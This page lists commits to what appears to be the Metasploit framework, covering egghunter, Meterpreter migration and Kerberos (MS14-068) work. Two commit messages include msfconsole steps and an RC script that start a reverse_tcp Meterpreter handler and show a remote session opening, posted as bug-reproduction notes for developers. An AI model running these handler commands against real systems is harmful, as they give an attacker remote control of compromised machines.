Commit Graph

3139 Commits (3297d198f33f9c0692375e04b5c15ef14ef73b9e)

Author SHA1 Message Date
sgabe 3297d198f3 Fix search-forward option in regular egghunter 2015-01-16 22:16:30 +01:00
sgabe 95eab85df4 Add support for heap-only search in regular egghunter 2015-01-13 21:31:13 +01:00
Meatballs 0b0ac1455a
Merge remote-tracking branch 'upstream/master' into extapi_service_post
Conflicts:
	test/modules/post/test/services.rb
2015-01-07 20:53:34 +00:00
William Vu 0bece137c1
Land #4494, Object.class.to_s fix 2015-01-06 02:27:35 -06:00
Meatballs dd5c638ab0
Merge remote-tracking branch 'upstream/master' into extapi_service_post 2015-01-05 22:18:44 +00:00
OJ 17ff546b0f Remove unnecessary calls to expand path
When using the Meterpreter Binaries gem to locate the path to the
meterpreter DLLs, it's not necessary to use File.expand_path on
the result because the gem's code does this already.

This commit simple removes those unnecessary calls.
2015-01-03 08:30:26 +10:00
sinn3r d45cdd61aa Resolve #4507 - respond_to? + send = evil
Since Ruby 2.1, the respond_to? method is more strict because it does
not check protected methods. So when you use send(), clearly you're
ignoring this type of access control. The patch is meant to preserve
this behavior to avoid potential breakage.

Resolve #4507
2015-01-02 13:29:17 -06:00
Christian Mehlmauer 4f11dc009a
fixes #4490, class.to_s should not be used for checks 2014-12-31 10:46:24 +01:00
jvazquez-r7 722f86f361 Try to guess TMPDIR folder 2014-12-30 18:39:29 -06:00
jvazquez-r7 7596d211e9 Use length for comparision 2014-12-30 18:39:18 -06:00
jvazquez-r7 e903044fd5 Allow to provide writable dir 2014-12-30 18:36:30 -06:00
jvazquez-r7 f17a7e8a61 Better handling of the unix domain socket argument 2014-12-30 18:36:28 -06:00
jvazquez-r7 4df4e8b9d6 Add support for linux meterpreter migration 2014-12-30 18:34:24 -06:00
jvazquez-r7 56df2d0062 Add support for linux meterpreter migrate types 2014-12-30 18:30:15 -06:00
Tod Beardsley 135faeee29
Land #4095, specs for Rex::OLE 2014-12-30 14:25:09 -06:00
Tod Beardsley a8e907d68b
Land #4479, nil comparisons and missing DLLs
Also fixes #4474.
2014-12-30 13:55:54 -06:00
Brent Cook bdac5db695 remove usage of ==/!= nil
Adjust all module-loading libraries to have consistent nil?/!nil? checking and
'if' style.
2014-12-30 10:59:49 -06:00
Jon Hart d727ac5367
Alias Rex::Ui::Text::Output::Tee print_raw to write, fixes #4469 and #4363 2014-12-29 16:47:04 -08:00
sinn3r 555713b6ae
Land #4456 - MS14-068, Kerberos Checksum (plus krb protocol support) 2014-12-29 16:09:28 -06:00
Brent Cook 5d70b837ed handle nil results from MeterpreterBinaries.path
When a meterpreter binary cannot be found, give the user some hint about what
went wrong.

```
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.43.1
lhost => 192.168.43.1
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.43.1:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.43.252
[*] Meterpreter session 1 opened (192.168.43.1:4444 -> 192.168.43.252:49297) at 2014-12-29 12:32:37 -0600

meterpreter > use mack
Loading extension mack...
[-] Failed to load extension: No module of the name ext_server_mack.x86.dll found
```

This is also useful for not scaring away would-be developers who replaced only
half (the wrong half) of their DLLs from a fresh meterpreter build and
everything exploded. Not that thats ever happened to me :)
2014-12-29 12:34:02 -06:00
Tod Beardsley 72eb8e6503
Land #4475, inverted timeout fix 2014-12-29 11:37:28 -06:00
Brent Cook bbb41c39b8 fix backward meterpreter packet timeout logic
The current logic times out every packet almost immediately, making it possible
for almost any non-trivial meterpreter session to receive duplicate packets.

This causes problems especially with any interactions that involve passing
resource handles or pointers back and forth between MSF and meterpreter, since
meterpreter can be told to operate on freed pointers, double-closes, etc.

This probably fixes tons of heisenbugs, including #3798.

To reproduce this, I enabled all debug messages in meterpreter to slow it
down, then ran this RC script with a reverse TCP meterpreter, after linking in
the test modules:

(cd modules/post
 ln -s ../../test/modules/post/test)

die.rc:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.1
exploit -j
sleep 5
use post/test/services
set SESSION 1
run
2014-12-29 08:15:51 -06:00
jvazquez-r7 d148848d31 Support Kerberos error codes 2014-12-24 18:05:48 -06:00
jvazquez-r7 05a9ec05e8 raise NotImplementedError 2014-12-23 19:59:37 -06:00
jvazquez-r7 4493b3285c Raise NoMethodError for methods designed to be overriden 2014-12-23 19:51:41 -06:00
jvazquez-r7 fee033d6df Use Rex::Text.md5_raw 2014-12-23 19:30:23 -06:00
Meatballs b41e259252
Move it to a common method 2014-12-23 11:16:07 +00:00
jvazquez-r7 13ec578d1a Revert "Back to Create OpenSSL::BN from string"
This reverts commit 635a54ca94.
2014-12-22 23:17:03 -06:00
jvazquez-r7 635a54ca94 Revert "Create OpenSSL::BN from string"
This reverts commit fe99b65a62.
2014-12-22 19:14:07 -06:00
jvazquez-r7 fe99b65a62 Create OpenSSL::BN from string 2014-12-22 18:44:47 -06:00
jvazquez-r7 d12b43d257 Use Intege.new 2014-12-22 18:37:07 -06:00
jvazquez-r7 ad97457a39 Move more constants to Crypto 2014-12-22 15:27:16 -06:00
jvazquez-r7 75a2846377 Add more PAC constants 2014-12-22 15:14:46 -06:00
jvazquez-r7 5a6c915123 Clean options 2014-12-22 14:37:37 -06:00
jvazquez-r7 ff208002d7 Reorganize the Crypto mixin 2014-12-22 11:57:35 -06:00
jvazquez-r7 9f1403a63e Add initial specs for Msf::Kerberos::Client::TgsResponse 2014-12-20 20:29:00 -06:00
jvazquez-r7 5f0c3ebb2b Add documentation for Msf::Kerberos::Client::TgsResponse and TgsRequest 2014-12-20 19:32:38 -06:00
jvazquez-r7 e35218b6f1 Add documentation for Msf::Kerberos::Client::CacheCredential 2014-12-20 18:28:36 -06:00
Tod Beardsley d3050de862
Remove references to Redmine in code
See #4400. This should be all of them, except for, of course, the module
that targets Redmine itself.

Note that this also updates the README.md with more current information
as well.
2014-12-19 17:27:08 -06:00
jvazquez-r7 fad08d7fca Add specs for Rex Kerberos client 2014-12-19 12:14:33 -06:00
jvazquez-r7 f4037b1003 Clean Kerberos Rex client code 2014-12-19 11:08:48 -06:00
jvazquez-r7 dfa92da287 Add TODO 2014-12-19 01:13:56 -06:00
jvazquez-r7 77e2d4d90d Add documentation for the Kerberos PAC support classes 2014-12-19 01:12:14 -06:00
jvazquez-r7 fda4cd3440 Fix some Rex Kerberos model documentation 2014-12-18 19:30:12 -06:00
jvazquez-r7 c426cf32d0 Add specs for Rex::Proto::Kerberos::CredentialCache::Principal 2014-12-18 17:40:06 -06:00
jvazquez-r7 16d5ee1aae Add documentation for the rex credential cache support 2014-12-18 17:12:58 -06:00
jvazquez-r7 7275f5a5f2 Allow Rex to load credential_cache 2014-12-18 16:32:21 -06:00
jvazquez-r7 f325d2f60e Add support for cache credentials in the mixin 2014-12-18 16:31:46 -06:00
jvazquez-r7 0a61e108ea Add code skeleton for credential_cache 2014-12-18 00:30:47 -06:00
jvazquez-r7 0f19f3cf2e Add classes templates 2014-12-17 23:16:58 -06:00